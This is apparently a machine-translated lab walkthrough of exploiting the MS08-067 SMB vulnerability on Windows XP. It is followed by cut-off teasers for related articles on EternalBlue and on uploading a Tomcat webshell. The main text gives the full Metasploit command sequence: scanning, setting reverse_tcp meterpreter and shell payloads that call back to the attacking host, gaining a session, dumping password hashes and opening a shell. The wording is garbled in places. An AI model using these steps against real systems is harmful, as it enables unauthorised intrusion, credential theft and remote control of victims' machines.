1. Construction of experimental environment
1. Target machine: a vulnerable windows xp 2002 ip: 192.168.0.116
2. Attacking machine: a kail liunx, a kail liunx, ip, ip: 192.168.0.110, ip, 192.168.0.110
2. Start to reproduce
1. Use the nmap tool to scan to confirm the existence of vulnerabilities, nmap -n -p445 --script smb-vuln-ms08-067 192.168.0.116 --open (lady's nmap is 7.4)

2. Open the artifact metasploit, terminal input: msfconsole
3. Search for vulnerabilities, search ms08-067

4. Use the module, use exploit / windows / smb / ms08_067_netapi

5. View the parameters that need to be set, show options

6. Set the target IP, set RHOST 192.168.0.116

7. Set the payload, set payload windows / meterpreter / reverse_tcp

8. View the parameter settings, here you need to set the attack machine ip, show options

9. Set the local ip, set LHOST 192.168.0.110

10. The target system defaults to automatic positioning. If you need precision, you can show targets to view all, and then select, set target x, here the guy defaults

11. Run exploit to successfully obtain sessions

12. Enter ps to view the progress

13. Query user id and working directory, pwd, is system

14. Fetch local hash (This function seems to be only available for administrators and above)

15. Enter shell and come to cmd mode

3. Introduce another payload of this module
1. Still use this attack module, use exploit / windows / smb / ms08_067_netapi

set payload windows / shell / reverse_tcppayload Set payload
set RHOST 192.168.0.116 Set the target IP
set LHOST 192.168.0.110 Set the attack machine ip

3. Check whether the parameters are wrong, show options (target is also the default)

4. Run, exploit, get a shell directly

Thank you guys for your face appreciation, please enlighten me if there are any deficiencies, welcome bombing, thank you! ! !
The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, t...
#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...
lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...
MS17010 (Eternal Blue) Vulnerability Exploitation and Reappearance 0X00 Introduction Eternal Blue refers to the evening of April 14, 2017, the hacker group Shadow Brokers (shadow brokers) announced a ...
Article directory grab bag Blow password Upload the war package containing webshell grab bag The account password is here, the format is base64 encoding of tomcat:123. Blow password Upload the war pac...
ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...
MS08-067 Remote Overflow Vulnerability Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...
1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...
0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...
Put the previous experiments and written in the note in the cloud, put it on the CSDN First, an experimental environment Target: Windows XP SP3 Professional (Close Windows self-contained firewall!!!) ...